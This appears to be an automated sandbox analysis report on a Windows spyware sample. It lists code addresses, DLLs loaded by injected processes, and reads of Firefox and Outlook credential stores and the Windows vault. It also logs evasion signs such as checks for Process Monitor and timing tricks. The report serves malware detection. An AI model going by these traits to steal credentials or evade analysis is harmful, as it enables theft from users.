                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E3AD00
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ECCD1F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED12ED
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E4B2C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E352A0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E7739A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E1D34C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE132D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE70E9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEF0E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EDF0CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E370C0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E3B1B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EFB16B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E6516C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E1F172
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE16CC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E75630
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEF7B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E21460
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEF43F
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ECD5B0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE7571
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EDDAC6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ECDAAC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E75AA0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02ED1AA3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EA3A6C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEFA49
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EE7A46
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EA5BF0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E6DBF9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E4FB80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EEFB76
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E338E0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E9D800
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E39950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E4B950
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02EC5910
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E39EB05_2_02E39EB0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFFB15_2_02EEFFB1
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E31F925_2_02E31F92
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFF095_2_02EEFF09
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EEFCF25_2_02EEFCF2
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EA9C325_2_02EA9C32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E4FDC05_2_02E4FDC0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE7D735_2_02EE7D73
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02E33D405_2_02E33D40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_02EE1D5A5_2_02EE1D5A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00411C305_2_00411C30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CB185_2_0040CB18
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CB205_2_0040CB20
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040CD405_2_0040CD40
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AD305_2_0040AD30
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AE745_2_0040AE74
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AEC95_2_0040AEC9
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0040AE805_2_0040AE80
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004152D05_2_004152D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004134CB5_2_004134CB
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_004134D05_2_004134D0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0042B8F05_2_0042B8F0
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEE2175_2_00AEE217
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AEE3385_2_00AEE338
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AED7985_2_00AED798
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_00AECA245_2_00AECA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E77E54 appears 111 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02EAF290 appears 105 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E65130 appears 58 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E1B970 appears 277 times
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: String function: 02E9EA12 appears 86 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: String function: 00376AC0 appears 42 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: String function: 0037F8A0 appears 35 times
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: String function: 0036EC2F appears 68 times
                Source: xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003883000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs xaqnaB0rcW.exe
                Source: xaqnaB0rcW.exe, 00000000.00000003.1348761048.0000000003A2D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs xaqnaB0rcW.exe
                Source: xaqnaB0rcW.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@8/6
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0039CE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0039E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00396532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003AC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0035406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | File created: C:\Users\user~1\AppData\Local\Temp\aut48E4.tmp
                Source: xaqnaB0rcW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: TCPSVCS.EXE, 00000005.00000003.1855291448.00000000007A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINp5zENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1857921204.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1855291448.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2601089290.00000000007F1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: xaqnaB0rcW.exe | Virustotal: Detection: 59%
                Source: xaqnaB0rcW.exe | ReversingLabs: Detection: 83%
                Source: unknown | Process created: C:\Users\user\Desktop\xaqnaB0rcW.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\xaqnaB0rcW.exe"
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Process created: C:\Windows\SysWOW64\TCPSVCS.EXE "C:\Windows\SysWOW64\TCPSVCS.EXE"
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: xaqnaB0rcW.exe | Static file information: File size 1223680 > 1048576
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: xaqnaB0rcW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSxcaEmiOTH.exe, 00000004.00000002.2601053518.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, HSxcaEmiOTH.exe, 00000006.00000000.1736924979.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: tcpsvcs.pdb source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: xaqnaB0rcW.exe, 00000000.00000003.1346062585.0000000003900000.00000004.00001000.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1348367351.0000000003760000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1548490158.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546380846.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658601203.000000000389E000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, TCPSVCS.EXE, 00000005.00000003.1671550855.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000003.1668866979.0000000000839000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2603154113.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: tcpsvcs.pdbGCTL source: svchost.exe, 00000002.00000002.1658450513.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1658469948.0000000003012000.00000004.00000020.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000004.00000002.2601780652.0000000001268000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2604587139.000000000341C000.00000004.10000000.00040000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1964888144.000000003FBCC000.00000004.80000000.00040000.00000000.sdmp
                Source: xaqnaB0rcW.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: xaqnaB0rcW.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: xaqnaB0rcW.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: xaqnaB0rcW.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: xaqnaB0rcW.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036E01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00376B05 push ecx; ret 0_2_00376B18
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004122D5 pushad ; ret 2_2_004122FD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D286 pushad ; ret 2_2_0040D29D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004032B0 push eax; ret 2_2_004032B2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408306 push ds; retf 2_2_00408307
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404D95 push edx; retf 2_2_00404D96
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418FFD push esi; iretd 2_2_00418FFE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004177A9 push ds; retf 80F3h 2_2_004177B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_02E209AD push ecx; mov dword ptr [esp], ecx 5_2_02E209B6
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_004123FB pushfd ; iretd 5_2_004123FC
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_004144F6 push ds; retf 80F3h 5_2_00414500
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_004205E4 push ss; retf 5_2_004205E8
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00405053 push ds; retf 5_2_00405054
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0040F022 pushad ; ret 5_2_0040F04A
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0041B736 push edx; retf 5_2_0041B737
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_0041D868 push ebp; ret 5_2_0041D86D
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00401AE2 push edx; retf 5_2_00401AE3
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00415D4A push esi; iretd 5_2_00415D4B
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AEB4CC push ebp; ret 5_2_00AEB4D4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AE95C2 push ecx; iretd 5_2_00AE95C7
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AE4C01 push ebp; retf 5_2_00AE4C0C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AE2E0D push es; iretd 5_2_00AE2E14
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Code function: 5_2_00AE5E46 pushfd ; iretd 5_2_00AE5E47
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003B8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0037123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0037123A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeAPI/Special instruction interceptor: Address: FD9D4C
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: xaqnaB0rcW.exe, 00000000.00000003.1338506209.0000000001028000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000002.1351052607.000000000109F000.00000004.00000020.00020000.00000000.sdmp, xaqnaB0rcW.exe, 00000000.00000003.1338600645.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEWindow / User API: threadDelayed 9717Jump to behavior
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94807
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeAPI coverage: 4.3 %
